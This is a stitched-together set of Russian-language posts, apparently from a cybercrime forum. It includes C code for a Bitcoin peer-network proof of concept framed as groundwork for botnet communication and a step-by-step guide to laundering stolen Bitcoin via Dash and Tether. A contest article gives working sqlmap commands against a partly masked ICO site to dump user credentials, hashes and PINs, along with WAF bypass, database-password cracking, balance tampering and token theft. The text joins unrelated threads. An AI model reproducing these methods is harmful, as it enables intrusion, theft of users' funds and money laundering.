(sockaddr *)&rAddr,(int *)&DnsBufSize);
if(!RecvSize || RecvSize == SOCKET_ERROR) {
goto exit_1;
}

DNS_BYTE_FLIP_HEADER_COUNTS((PDNS_HEADER)pDnsBuf);

if( DnsExtractRecordsFromMessage_W((PDNS_MESSAGE_BUFFER)pDnsBuf,RecvSize,\
&pDnsRecord) ) {
goto exit_1;
}

RecvSize = (DWORD)pPeerList;
while(pDnsRecord) {

if( pDnsRecord->wType != DNS_TYPE_A) {
pDnsRecord = pDnsRecord->pNext;
continue;
}

*(int *)pPeerList = pDnsRecord->Data.A.IpAddress;
pPeerList = (int *)pPeerList + 1;
pDnsRecord = pDnsRecord->pNext;

}

DnsRecordListFree((PDNS_RECORD)pDnsRecord,DnsFreeRecordList);

exit_1:
CloseHandle(hEvent);
closesocket(pSocket);

exit_2:
FreeMem(pDnsBuf);

return (HANDLE)RecvSize;
}

Click to expand...

Приведённая функция возвращает handle на выделенную память с адресами нодов.
В полном исходнике, который я приложу в конце статьи нет функции для создания своего пира.
В принципе ничего сложного нет - достаточно открыть порт(8333 - если основная сеть, 18333 - если
тестовая сеть) и принимать входящие соединения.
Процесс авторизации аналогичен процессу подключения (пункт 3, техническое описание протокола),
за исключением того, что:

(I) Вам придётся принимать входящие команды. Из основных я бы выделил только частоприходящие - это
"inv", "getaddr", "addr". На пакеты "inv" и "addr" в принципе можно не отвечать.
На пакет "getaddr" потребуется ответить пакетом "addr" с указанием своего IP, а также других.

(II) Время от времени надо слать ping/pong для поддержания соединения, а также свой IP в пакете "addr".

Для тех, кто заинтересован в протоколе, прикладываю также в архиве с сорцами документацию.

5)STUN: getting external IP address
В самом bitcoin для получения внешнего IP, парсится два сайта: checkip.dyndns.org и showmyip.com/simple/
Я решил пойти другим более стабильным путём, а именно через STUN(Session Traversal Utilities for NAT).

Более подробно о STUN читайте тут: tools.ietf.org/html/rfc3489

В проекте, функция лишь используется для проверки того, находится ли нода за NAT.
Акцентировать много внимания на нём я не буду, приведу сразу исходник:

#define STUN_DEFAULT_PORT 3478
#define MAPPED_ADDRESS 0x0001
#define CHANGE_REQUEST 0x0003
#define Binding_Request 0x0001
#define Binding_Response 0x0101

char *StunServers[][2] = { "stun.stunprotocol.org", 0,
"stun.ekiga.net", 0,
"stun.ideasip.com", 0,
"stun.iptel.org", 0,
"stun.rixtelecom.se", 0,
"stun.schlund.de", 0 };

#define bswap16(x) ((((x) & 0xff) << 8) | (((x) >> 8) & 0xff))

#define bswap32(x) ((((x) & 0xff) << 24) | (((x) & 0xff00) << 8) \
| (((x) >> 8) & 0xff00) | (((x) >> 24) & 0xff))

#pragma pack(push, 1)
typedef struct _STUN_MSG {
WORD msgType;
WORD msgLength;
BYTE id[16];
WORD type;
WORD length;
DWORD value;

} STUN_MSG;
#pragma pack(pop)

#define STUN_BUFFER_SIZE 0x1000

int GetExternalIP() {
SOCKET pSocket;
sockaddr_in sAddr, rAddr;
hostent *hostent_s;
int ExternalIP, len, RecvSize;
HANDLE hEvent;
STUN_MSG *pBuf;
STUN_MSG stun;

pBuf = (STUN_MSG *)AllocMem(STUN_BUFFER_SIZE);
if(!pBuf) {
return FALSE;
}

pSocket = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
if(pSocket == INVALID_SOCKET) {
return FALSE;
}

hEvent = WSACreateEvent();
if(WSAEventSelect(pSocket,hEvent,FD_READ)) {
goto exit_2;
}

{
for(int i = 0; i < sizeof(StunServers)/sizeof(StunServers[0]); i++) {

sAddr.sin_family = AF_INET;

if(!StunServers[ i ][1]) {
sAddr.sin_port = htons(STUN_DEFAULT_PORT);
} else {
sAddr.sin_port = htons((WORD)StunServers[ i ][1]);
}

hostent_s = gethostbyname(StunServers[ i ][0]);
if(!hostent_s) {
continue;
}

sAddr.sin_addr.s_addr = *(int *)hostent_s->h_addr_list[0];

RtlZeroMemory(&stun, sizeof(stun));
stun.msgType = bswap16(Binding_Request);
stun.msgLength = bswap16(0x8); // sizeof(type + length + value)
RAND_bytes((DWORD *)&stun.id, sizeof(stun.id)); // Transaction ID
stun.type = bswap16(CHANGE_REQUEST);
stun.length = bswap16(0x4);

back:
len = sizeof(stun);
if( sendto(pSocket,(char *)&stun,len,NULL,(sockaddr *)&sAddr,\
sizeof(sAddr)) != len ) {
continue;
}

if(WaitForSingleObject(hEvent,5*1000)) {
goto back;
}

RtlZeroMemory(pBuf, STUN_BUFFER_SIZE);
len = sizeof(rAddr);
RecvSize = recvfrom(pSocket,(char *)pBuf,STUN_BUFFER_SIZE,NULL,\
(sockaddr *)&rAddr,(int *)&len);
if(!RecvSize || RecvSize == SOCKET_ERROR) {
continue;
}

if(bswap16(pBuf->msgType) == Binding_Response) {

for(int i = 0; i < bswap16(pBuf->msgLength); ) {

if( bswap16((pBuf->type + i)) == MAPPED_ADDRESS) {
ExternalIP = (int )( ((int)&pBuf->value + i) + 4 ); // Family=0x01, Port = 0x**
break;
}
i += bswap16(pBuf->length) + 4; // sizeof(type) + sizeof(length)
}

break;
}

}

}
exit_2:
CloseHandle(hEvent);
closesocket(pSocket);
FreeMem(pBuf);

return ExternalIP;
}

Click to expand...

6)Эпилог
Моя статья - это лишь демонстрация PoC(Proof of concept). В мои планы не входило создание самодельного
протокола для общения между ботами поверх основной сети и верификации команд через ассиметричный
криптоалгоритм. В исходниках я приложил базовые основы для создания своего пира.
В качестве примера, программа подключается к тестовой или основной сети и собирает nodes list.
При желании, вы сможете сотворить из этого нечто большее Будут вопросы - обращайтесь.

Архив с сорцами:

Spoiler: 10

LINK: https://www.dropbox.com/s/80xcvndix9guns8/abc.rar?dl=1
PASS: damagelab_newyear2014_UG()!*&@W()!*G)(!@G)_!@YG)!)JWQ

Respects goes 2 all members of xss.is/, которые так или иначе поддерживают меня.
Спасибо вам ребята за моральную поддержку! Поздравляю всех с наступающим 2014 годом!
Напоследок посоветую всем перечитать первый пункт

Постскриптум:
Честно, удивительно, что до этого никто не создал сеть подобную bitcoin. Идея, грубо говоря витала
в воздухе и любой подкованный программист выше среднего уровня с хорошим знанием криптографии, смог бы
создать такого рода систему. Может просто не было ТЗ ?

Критика сорцов - не принимается . Писал код ровно 3 дня напролёт.

Напоминаю, что USDT, USDC и прочие стейбкоины небезопасны. Вам могут в любой момент заблокировать деньги.

Пример
Сообщение с bitcointalk от пользователя AlNu

Tether блокирует USDT
Вот вам реальный пример потери $301'000 из-за блокировки USDT.
Адрес (https://etherscan.io/address/0xb1fa690155821bf9191d609593b556048aca517c#tokentxns) человека, который сделал вывод 300'900 USDT c Binance, с понятной и объяснимой историей исходя из данных блокчейн Ethereum.
Человек сразу переводит эти 300'900 USDT на девственно чистый новый адрес (https://etherscan.io/address/0x5441bfcda141759eaae9737a28cb2f9fd43e8869#tokentxns).
Через несколько часов человек разбивает сумму на два адреса - отправляет 200'600 USDT с этого нового адреса на девственно чистый новый второй адрес (https://etherscan.io/address/0x087a39ecd3e12db24b76025efaf077a2fd6e44c2#tokentxns).
И через час оба новых адреса вносят blacklist!
То есть, подумайте, пользователь начал разбивать свои средства (переводить с одного адреса на другие) - и эмитент стейблкоина отследил перевод и заблокировал токены на обоих адресах, при этом не тронув первичный адрес, на который всё вышло с биржи.

Результат
301'000 USDT потеряны.
Поддержка компании-эмитента Tether на запросы не отвечает.
Человек уже 1.5 месяца не может ничего сделать.
И таких ситуации будет всё больше. Регулирование лишь ужесточается.

Все это прописывается к контракте самого стейблкоина.
И вот анализ по основным стейблкоинам!

USDT-Bitcoin (issuer can freeze: yes, contract open source: yes)
USDT-Ethereum (issuer can freeze: yes: open source: yes)
USDT-EOS (issuer can freeze: yes, open source: no)
USDT-Tron (issuer can freeze: yes, open source: no)
USDT-Liquid (issuer can freeze: no, open source: yes)
USDC-Ethereum (issuer can freeze: yes, open source: yes)
PAX-Ethereum (issuer can freeze: yes, open source: yes)
TUSD-Ethereum (issuer can freeze: yes, open source: yes)
TUSD-Binance (issuer can freeze: yes, open source: no)
BUSD-Ethereum (issuer can freeze: yes, open source: yes)

Т.е. в любой момент ваш адрес может попасть в блэклист и ваши стейблкоины могут просто заморозится у вас на кошельке!
На данный момент только DAI не имеет функции заморозки не и USDT-Liquid (но не нашел кто его применяет)

Click to expand...

Примеры из новостей
<https://forklog.com/tether-zablokirovala-na-39-ehereum-adresah-milliony- dollarov-v-usdt/>

Оригинальное уведомление/предупреждение от Chainalysis
[https://www.prnewswire.com/news-rel...compliance-solution-for- tether-301003370.html](https://www.prnewswire.com/news-releases/chainalysis- provides-anti-money-laundering-compliance-solution-for-tether-301003370.html)

Исследование
[https://medium.com/human-rights-fou...ghts-blacklists-and- traceability-6d74ee17c25d](https://medium.com/human-rights-foundation- hrf/privacy-and-cryptocurrency-part-iv-stablecoins-for-human-rights- blacklists-and-traceability-6d74ee17c25d)

Долгое время мы тестировали, исправляли, переписывали своего торгового бота на рынке криптовалют. На данный момент бот идеально работает и наша команда хотела бы запустить топик по демонстрации live статистики сделок для того, чтоб опровергнуть теорию о том, что все боты являются минусовыми.
Выставлена стартовая сетка, которая послужит дальнейшим вектором для работы с противовесными ордерамиView attachment Стартовая сетка.png

Так а что ты предлагаешь-то ? Купить у теюя бота? Или что ?
Просто не понятно для чего тема создана.
А с одного скриншота не понятно ничего, от слова совсем.
Хоть какой то конкретики бы.

Какой холодный кошелек выбрать для бтк без палева с ledger? Нашел github.com/pointbiz/bitaddress.org если поставить его на локалку и сгенерить, то будет норм?

Поискал по форуму и удивился, что bitcoin не нашел путь в массы пока. Анонимная децентрализованная валюта - казалось бы мечта хакера, но все как-то предпочитают wmz или LR. В чем загвоздка?

А столько ж тем можно было б замутить - от полностью автоматического гарант сервиса до ботнетов, которые сам себе хостинг покупают.

В этой теме буду выкладывать просто графики, без аналитики, без мыслей, без "экспердов" и экспертов. Просто голые цифры и графики.

Типичный пузырь на финансовом рынке выглядит так:

Знаменитый пузырь доткомов 2000х (Dot-com bubble) на Nasdaq

График (цена bitcoin), наложенный на пузырь доткомов, по февраль-2018

График - пузырь золота (он точно так же отработал по циклам рынка) 1970-2014 год

График цены Bitcoin, по июнь-2018

Вопрос навеян соседней темой. Как сервисы очистки технически чистят грязную крипту? Допустим, в транзе будет 60% по амлу миксер или рансом
транзу разбирают на части и чистые амл-битки используют? а что делают с оставшимися грязными?
или наоборот, соединяют в большие блоки и большими суммами загоняют на биржи, теряя там небольшие % грязи?
Как технически это происходит?
Интересно ваше профессиональное мнение, господа.

Часто слышу что люди не пользуются биткоином потому что довольно легко отследить и курс постоянно скачет. В этой статье я расскажу как в "домашних" условиях отмыть биток (с локера к примеру) и потом застолбить его по сегодняшнему курсу.

Для этого всего нам понадобится - одна виртуальная машина, я юзаю VirtualBox с Кали Линукс. Можно прям скачать себе ova образ, ничего самому делать не надо. Но можно взять и винду, кому как нравится.

Итак начнем, стартуем виртуальную машину. В ней запускаем TOR как сервис на порту 9050. Потом качаем:

1. atomic wallet от сюда atomicwallet.io
2. electrum dash от сюда electrum.dash.org
   Заводим грязь сразу на атомик, там меняем на dash и выводим себе на electrum.dash кошелек. Всё это надо делать под тором и желательно ещё в openvpn.
   И первый этап готов!

Идём дальше, на своём хосте или в другой виртуалке, как кому нравится качаем тоже самое. После с "грязного" кошелька даш вы переводите на "белый" electrum.dash кошелек на свой машине. Kак ЧИСТАЯ mонета зашла заводите её в atomic wallet.
Этап второй по отмывке готов!

Следующий шаг, вы меняете dash на TETHER или TRUEUSD, тем самым вы получаете стабильный курс закрепленный в доллар.
И там $ лежат пока вам надо будет их вывести а потом уже опять меняете на биткоин и выводите себе на кошелек получив чистый биток и по тому курсу по какому вы заводили с минимальными % потерями.

Удачи!

Привет всем. Посоветуйте какой кошелёк в данный момент хороший по мимо Blockchain
Хочу от него уйти, но не знаю какой выбрать новый

В последние недели резко увеличился негативный информационный фон вокруг криптовалютного рынка. Падение курса биткоина до $3 500 выбивает почву из-под ног неопытных инвесторов, особенно у тех, кто вложил крупную сумму на пике или даже взял кредит для покупки криптовалют. Что делать и чего ждать в будущем? Полного краха или покорения новых вершин?

Энтузиасты и подавляющая часть сообщества по-прежнему считают биткоин и иные криптовалюты перспективными инвестиционными инструментами, поскольку обвал на рынке происходит уже не первый раз, при этом не являясь самым крупным в истории в процентном соотношении.

Еще в 2014 году, в момент более крупного обвала с $1 237 до $111, в сеть был выложен анализ курса биткоина в будущем на основе нелинейной логарифмической прогрессии. Достижение отметки $10 000 было предсказано за 3 года с погрешностью всего на 6 дней. На графике указана дата 22 ноября 2017 года, фактический пробой отметки $10 000 состоялся 28 ноября. Этот анализ назвали “Bitcoin Pump”:

Достижение отметки $100 000 датировано 16 июля 2021 года, с возможной погрешностью в 5-7 дней. В период с 2019 по 2020 год рынок "ожидает спокойное и постепенное движение" к $10 000, после чего ожидается очередное восходящее «ралли» к отметке $100 000.

Один из криптовалютных аналитиков, Мурад Махмудов, на своей странице в Twitter опубликовал прогноз роста курса биткоина до $160 000 к 2023 году, также основываясь на логарифмической прогрессии и техническом анализе.

Данный прогноз был сделан в июле 2018 года, предсказывая падение в октябре к $3 000. Прогноз оправдался почти полностью и с небольшим опозданием.

Приведенный ниже график датирован октябрем 2018 года, перед началом падения к $4 000. Здесь приводится сравнение с периодом 2014-2016 годов. Аналогичной ситуации можно ожидать в период с 2018 по 2020 год.

Еще один анализ от 15 ноября 2018 года. Аналогичная ситуация складывалась в период с 2014 по 2016 год. Возможна более глубокая коррекция к $2 800 в первом квартале 2019 года.

Представленные выше аналитические графики при наложении друг на друга задают практически одинаковые прогнозы. В ближайшее время нас ожидает относительно спокойный период на рынке, после чего курс биткоина, возможно, продолжит восхождение к новым горизонтам и перешагнет отметку в $100 000 в период с 2021 по 2023 год.

Сегодняшняя ситуация на рынке повторялась не раз, как говорил великий Чарльз Доу: “История повторяется”.

Общем история следующая, мои знакомые решили купить биток и подождать пока он вырастет, взяли на бирже и решили отправить на веб кошелек: bitcoin- wallet.org, скорее всего попали на фиш.
Зачем они это сделали ? я не знаю.
Хэш транзы: 349c40b56890790a614437ac6338099f505c0b81a11634bcdd4902bcf601abb9
Адрес куда ушли 12 btc: 12dhXFDKbKBj5iyMZii6wbjTp86rYsM2K8

Можно ли как-то отследить тех кто украл ? Какие вообще варианты?

I propose to everyone who wishes in front of the Administration of this forum to make a wager.
My bet is that bitcoin will be worth more than $260,000 at the time of June 20, 2023.
All wishing to make a bet please write in personal messages through the guarantor of this forum!
Budget 100 BTC
Have a nice game!

Как вывести 8 BTC в рашку и спокойно распоряжаться деньгами, нет мне не надо отмыв. Просто на сбер. Понимаю что есть обменники которые до 300тыс. максимально что я нашел.
С чем могу столкнуться?
Как лучше это сделать?
Минимальные потери на комиссии и т.д. Интересует все.
Может важно может нет, на моем сбере более 500 000 руб не когда не бывало. Думаю малоли внимание налоговой и т.д.
Готов рассмотреть другие банки РФ на вывод так же. Сбер не панацея.
И не над рекламить псевдо-обменники. Я лишь хочу получить адекватную консультацию.

Ну и надеюсь правила не нарушил, я по ру не работаю. Тут вопрос в другом собственно.

Кто пользовался exodus.io? поделитесь отзывами и впечатлениями?

короче отправил 160к на обменник 170р комисия
3 часа торчит можно ускорить как то?

Что лучше использовать при анонимных платежах? xmr, dash, zcash? как по вашему, что обладает большим уровнем анонимности?

Предупреждение модератора: тема любого арбитража (особенно финансового) наводнена скамерами. Деньги легче потерять, чем заработать.

Здравствуйте всем,

Вот мой скромный вклад в форум, это не много, но хотя бы это работает. Я написал эту статью на русском, учитывая, что 90% статей на форуме на русском, надеюсь, все поймут…

Итак, перейдем к сути, в декабре я хотел купить Monero, поэтому пошел на биржу Kraken и купил немного. Конечно, мне пришлось это сделать с KYC, то есть удостоверить личность, сделать селфи и все такое.

Затем я начал изучать вопрос, чтобы увидеть способы покупки Monero без KYC и наткнулся на сайт localmonero.co

Действительно, можно купить Monero через приложения необанков, такие как Revolut или Wise, обычно люди покупают на 6-8% дороже рыночной цены.

Поэтому я купил Monero на Kraken и разместил объявления на localmonero, чтобы увидеть количество покупок. Я был действительно удивлен, так как в среднем мне приходилось обменивать около 1000 евро в день по цене на 8% выше. Учитывая, что комиссия составляет 1% плюс некоторые торговые сборы, можно сказать, что чистая прибыль с каждой транзакции составляет 6%.

Я обменял 30 000 евро за месяц и заработал около 1800 евро. Это небольшая сумма, конечно, но это бесплатные деньги, которые приходят без каких-либо усилий, пока вы сидите в трусах на своем диване, так что это всегда приятно!

Я использовал API localmonero, так что автоматизировал ответы на запросы торгов на localmonero, с уведомлениями в Telegram и т.д.

Я могу предоставить скрипт, если нужно.

С тех пор я остановился, потому что начал бизнес, который занимает много времени.

1800 евро – это довольно неплохо для начинающих молодых людей. Тем не менее, вам стоит быть осторожными, так как необанки могут запросить у вас обоснования для этих сумм в рамках своих обязанностей по борьбе с отмыванием денег.

Spoiler: screenshots

Конкурсная статья с экспы

Введение

В данной статье я расскажу реально рабочий кейс как поднять бабла практически без вложений и в короткие сроки, каждый этап будет рассмотрен детально дабы не осталось никаких вопросов, однако если такие будут, то велком в комментарии. Мы будем искать уязвимые ICO, дампить их и выводить с них токены на биржу, там уже куда вам захочется. Тем кто занимается дампами данная статья покажется очень знакомой, однако даже они найдут здесь что-то новенькое для себя, поскольку тут будет практический план действий. Я уверен, что обязательно найдутся хейтеры у которых я забираю хлеб этой статьей.

Поиск цели

Правильно подобранная цель это уже пол дела, именно от этого зависит насколько наша затея окажется удачной. Нам нужны ICO проекты c небольшой, но и немаленькой посещаемостью, примерно 20к просмотров в месяц будет достаточно, информацию по просмотрам вы можете посмотреть на соответствующих сайтах [1]

Следующий критерий это условия вывода с ICO, нам нужно найти икошку где не нужна валидная почта для вывода, а если и нужна то ее можно изменить без каких либо затруднений, желательно что бы для вывода требовался какой нибудь пинкод или код двухфакторной аутентификации, так же в целом неплохо будет если для вывода не нужно будет никаких подтверждений и т.д., но лучше всего что бы был 6 значный пинкод.

И так, где же все-таки найти такую цель? Цели мы позаимствует у наших собратьев хацкеров, которые в основном занимаются брутом, думаю все знают такие софты как кипер, булит и юбц, на этих платформах пишут бруты и чекеры на всякие сервисы, в том числе и на ico. Я буду искать на одном из соседних бордов, в следующей ветке.

Собственно заходим и смотрим топики, обычно в них есть описание этих самых сайтов, когда они выводят и что нужно для вывода, вообщем ищем икошки по критериям которые я перечислил выше, в некоторых топиках будет хайд, можем попросить личный, возможно вам его дадут. Собираем названия всех ico-сайтов в один текстовик.

Веб сканнеры

Теперь когда мы собрали нормальное количество икошек, нам нужно проверить каждую из целей в веб сканере.

Больше всего распространены следующие сканеры: Netsparker, Acunetix, Owasp Zap, burp suite. Как видите сканеров тут на любой вкус и цвет, однако же я советую использовать все сканеры по очереди, то что пропустил Спаркер может найти Акуша, или то что пропустили оба из этих сканеров может найти бурп, я использовал все эти сканеры и больше всего из них мне нравится спарки, овасп немного слабоват, а бурп даст прикурить им всем. Однако стоит заметить, что разные версии спаркера ведут себя по разному и одна версия спарки может найти дыру, а другая нет, я же использую следующие версии: 4.9.5.18523 и 5.9.1.29030.

Нам нужно настроить сканеры под поиск Sql injection, я буду показывать на примере Netsparker, в других сканерах ситуация практически аналогичная, отличия лишь в незначительных деталях.

Сначало нажимаем Scan Policy Editor, дублируем главный пресет, после переименовываем его как вам угодно и в Security Check Group оставляем галочку напротив Sql injection, так же вы можете использовать сканеры для поиска других уязвимостей, LFI, XSS, XXE и т.д. однако нам сейчас это не интересно, просто сохраняем настройки.

Жмякаем кнопку для начала скана, указываем ссылку на сайт который хотим просканить, выбираем соответствующий пресет который мы только что создали, так же если сайт имеет какие либо защитные механизмы которые генерируют специальные куки, то просто зайдите на сайт в браузере, дождитесь того момента как получите доступ к сайту, потом просто вставьте их в соответствующее окошко в спаркере, начинаем скан и можем идти по своим делам.

Если сайт уязвимый, то по окончанию в окошке Issues вы увидите примерно следующую картину, красный кружок с восклицательным знаком, жмякаем и он покажет где уязвимость, может быть такое что сайт уязвим сразу в нескольких местах, тут уже как повезет, так же если вы сканировали главный домен и ничего не нашли, то попробуйте просканить поддомены, в данном случае я сканировал именно поддомен на который редиректит когда хочешь авторизоваться на сайте.

Итак, вы можете кликнуть по уязвимому месту(“ /auth/email_chk (val2 (POST),val1) ”) правой кнопкой, выйдет контекстное меню, где смело читается строчка «Copy sqlmap Command », логично она копирует команду для мапы в буфер обмена, давайте же посмотрим что у нас скопировалось.

Как видим картинка не очень красивая, я больше предпочитаю составлять реквест файл и уже его пихать в мапу, как по мне так команда получается красивая и более лаконичная. Для составления реквест файла жмякаем по уязвимому месту(“ /auth/email_chk (val2 (POST),val1) ”), выбираем таб HTTP Request /Response , копирем все эти данные в какой нибуть текстовой файл и обязательно убираем пейлоуд который автоматом подставил спаркер (т.к. мапа должна подставить свой собственный) и убираем лишние и прочие мусорные заголовки которые являются лишними, можете сравнить скрин со спаркера выше и скрин с текстовика, сами все поймете.

Сохраняем все это в удобном нам месте и переходим к следующей части.

Sqlmap

В данной части я уже непосредственно расcмотрю как слить базу данных сайта, прежде чем приступить к дампингу обязательно обновите мапу** [2]** до последней версии. И так, команда которую нам дал спаркер выглядит следующим образом:

sqlmap.py -u "https://master.**.com/auth/email_chk" -p "val2" --risk="3" --level="3" --method="POST" --data="val1=netsparker%40example.com&val2=test" --user-agent="Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36" --cookie="__zlcmid=13IjuPSLHgWcLj8; ci_session=76vvdh8ren0vgikibjpvhe0mm9bspb5r" --headers="Host:master..com\nAccept:application/json, text/javascript, /; q=0.01\nAccept-Encoding:gzip, deflate\nAccept-Language:en- us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form- urlencoded; charset=UTF-8\nOrigin:https://master..com\nReferer:https://master..com/auth/signup\nX- Requested-With:XMLHttpRequest" --dbms="MySQL" --batch
После наших шаманских усилий с реквест файлом она приобразовывается в следующее:

sqlmap.py -r target.txt -p val2 --risk=3 --level=3 --dbms=MySQL --batch --dbs
Думаю разница вполне ощутима. И так давайте же посмотрим собственно, что значит каждый из аругементов и так же рассмотрим другие дополнительные которые тоже следует знать.

-u Этим аргументом мы указываем ссылку на нашу цель, которую хотим сдампить, --method соответственно указывает метод запроса, в нашем случае это POST запрос, если же нам попадется уязвимый сайт с GET методом, то в какой-то степени удобней будет указать ссылку на сайт не через реквест файл, а через аргумент -u (например если бы у нас был гет, а не пост: sqlmap.py -u "https://master.*****.com/auth/email_chk.php?val2=test" -p val2 --risk=3 --level=3 --dbms=MySQL –batch –dbs --random-agent), через параметр –data указывается отправляемая Post Data, при гет методе её нету, там дальше уже юзер-агент(--user-agent), хидеры(--headers), куки(--cookie).

Выше перечисленное мы просто запихали в реквест файл, тем самым красиво все оформив, я предпочитаю делать именно так и вам тоже советую.

-p Указывает на уязвимый параметр, в нашем случае это val2, смотрите в спаркере какой параметр у вас, и так же смотрите в спаркере какая DBMS используется на сайте, в моем случае это MySQL.

--batch Никогда не спрашивать пользовательского ввода, использовать поведение по умолчанию

--dbs Выводит базы данных

Про разные уровни --level и --risk вы можете прочитать по ссылке в источниках [3]

Так же есть важный аргумент, которого нет в нашей команде, однако он является обязательным, через который указывается техника sql иньекции, в некоторых случаях мапа может и вовсе не раскрутить скулю без него, у меня было очень много случаев, когда мапа просто не раскручивала скулю без этого параметра так что его лучше добавлять. Аргумент ---technique может принимать сразу несколько значений EUQBST, каждая буква означает разную технику, можно указать сразу несколько букв.

• Слепые
  • B: Boolean-based blind
  • S: Stacked queries
  • T: Time-based blind
• Обычные
  • E: Error-based
  • U: Union query-based
  • Q: Inline queries

В нашем случае я добавляю --technique=E.

Если по итогу вы получите вот такую картину, то значит мапа успешно раскрутила скулю и получила названия баз данных.

Теперь нам лишь нужно просмотреть таблицы, выбрать нужную и слить из нее данные. Вернемся к нашей команде.

sqlmap.py -r target.txt -p val2 --risk=3 --level=3 --dbms=MySQL --batch --dbs --technique=E
Теперь когда мы получили названия баз данных, аргумент --dbs нам больше не требуется, убираем его и преобразовываем команду следующим образом.

sqlmap.py -r target.txt -p val2 --risk=3 --level=3 --dbms=MySQL --batch --technique=E -D master_wallet --tables
Через -D выбираем базу данных, --tables говорим то что там нужны таблицы.

Теперь среди таблиц ищем ту, в которой предположительно хранятся данные пользователей, в нашем случае это таблица member, у вас она возможно будет назваться по другому (например users или что-то типо того), нужно смотреть по обстоятельствам, теперь получаем колонки -D master_wallet -T member --columns.

Теперь когда мы получили колонки примерно выбираем те, что нам нужны, в моем случае мне нужны данные о логине, пароле, почте, балансе, имени и пинкоде, другие данные имеют второстепенное значение для меня, указываем какие колонки нам нужны и сливаем их, по итогу команда получается вот такой:

sqlmap.py -r target.txt -p val2 --risk=3 --level=3 --dbms=MySQL --batch --technique=E -D master_wallet -T member -C mem_id,email,mem_pw,mem_name,gcc,deal_pw,mem_name,mobile --dump --threads=10
Начнется дампинг сайта, если вам нужно будет вдруг остановить его Ctrl+C

Начать с определенной строки --start=1000

Все что вы сдампили сохраняется в AppData\Local\sqlmap\output однако этот путь можно изменить, указав аргумент --output-dir

Про другие параметры которые есть в мапе можете узнать в документации** [4]**

Waf’ы и прочая дрочь

Пока наш сайт дампится, хотелось бы сделать небольшое отступление и так же раскрыть главный вопрос, который напрашивался с самого начала - «что же там по тамперам?».

По своему опыту скажу, что если вы использовали спаркер для поиска скули и он выдал вам дыру, то скорее всего никакие тамперы вам не понадобятся, а не раскручивается скуля потому, что сделали что-то неверно, более вероятнее попробовать поиграться с левелами и рисками, так же можно попробоваь добавить аргументы --no-cast или –hex(подробнее в доках).

Sqlmap сам типа умеет определять всякие waf, но тут ключевое слово «типа», лучше всего для определения waf использовать модули whatwaf** [5]** и wafw00f** [6]**.

Они вам выдадут тамперы, после вам нужно будет лишь добавить их к вашему запросу, если выдает несколько тамперов, то пробуйте каждый по очереди или совместите их.

Касательно тамперов нельзя сказать ничего конкретного какой куда подставлять, поскольку waf’ов очень много и практчески все индивидуальны и им нужен свой подход. Тот же клауд можно обойти если указать настоящий ip адрес сайта (можете нагуглить мануалов куча) и host сайта (-u “ip/auth/email_chk.php?val2” --host=”master.*****.com”).

Если есть желание, можете прочитать дополнительный материал про тамперы** [7]**

NaviCat И PHPMyAdmin(Full Access)

Все еще отступление…

Вы просто обязаны это прочитать!! Бывает такое что попадается уязвимый сайт, а там скуля слепая или бд такая большая что сливать очень долго, тогда как вариант можно попробовать подключиться к бд напрямую без скули. Если администратор тот еще алешка, то можно найти на сайте и такие артефакты как PHPMyAdmin, просто попробуйте добавить /phpmyadmin/ к сайту, авось окажется что там висит панелька, про которую сисадмин забыл.

Если же вы не нашли панельку, то попробуйте просканировать порты (“nmap site.com”), нам нужен порт 3306 на котором висит mysql.

Если же такой порт открыт, то мы может приконнектиться к серваку через NaviCat** [8]**. Однако теперь нам нужны учетные данные для mysql, где же их взять? Надеюсь вы не забыли про документацию по sqlmap.

Добавляем к команде аргумент –passwords и бум, вот что мы имеем по итогу. Мы получили имена пользователей и хэши их паролей, не спешите отменять мапу, пусть она попробует поломать пароли, вполне вероятно, что какой-либо из них она все таки сломает.

Нас интересует root учетная запись. Здесь у нас пароли хэшированны, для их взлома нужен хэшкет и база паролей, ну про то как это работает вы наверняка должны были слышать. Что же делать дальше, когда вы взломали пароли и получили доступ к учетке? А делать мы можем все, что захотим, поскольку теперь у нас есть полный доступ к базе данных, хоть удалить ее можем, но нас ведь интересует не это. Мы можем сдампить базу данных за очень короткое время, поскольку теперь у нас есть прямой доступ, база выкачивается в формате .sql, для того что бы потом считать данные можете воспользоваться стареньким как мир софтом SQLRip* [9]**.

Для того что бы подрубиться к базе с открыты портом 3306, качаем софтинку NaviCat, жмякаем Connection, в контекстном меню выбираем вашу DBMS, у меня это MySQL, после перед нами предстанет такое окно.

1. Пишем что хотим, можем написать название сайта который мы атакуем
2. Пингуем в cmd сайт и указываем здесь его айпишник
3. Юзернейм аккаунта который вы ломанули, на скрине мапы выше посмотрите внимательно, там хэш рут пользователя дублируется с другим юзернеймом, именно этот юзернейм и вводим
4. Без комментариев

Или же мы можем подкрутить некоторым пользователям баланс и добавить пару нулей. Тут все упирается лишь в знания самого языка sql, сам по себе он очень легкий и если даже вы его не знаете можно тупо нагуглить нужные вам вещи, это если у вас phpmyadmin. Если же у вас NaviCat, то вы просто получите экстаз от того, что там не нужно писать и строчки кода, просто изменяйте сами данные, остальное NaviCat сделает за вас, очень мощная софтина. Касательно того, как сдампить данные в навикэте.

Об этом в интернете особо ничего нет, мотайте на ус.

Хэш и два Антипаблика

Давай те же вернемся к нашему ico которое мы сливаем. Поскольму мы живем в 21 веке, это значит что? Правильно! Это значит что мд5 и другие «слабые» хэши уже никто не использует, сейчас практически на всех сайтах пароли зашифрованны бкриптом, что на порядок затрудняет работу дамперам, ведь не все готовы покупать такой материал, бкрипт хэши очень долго ломаются по причине своей специфичности, вот их и используют сейчас все кому не лень, даже самая маленькая шаражкина контора юзает бкрипт, и правильно! Я бы тоже использовал его если бы держал какой-нибудь сайт. Но мы не держим сайт, а атакуем его.

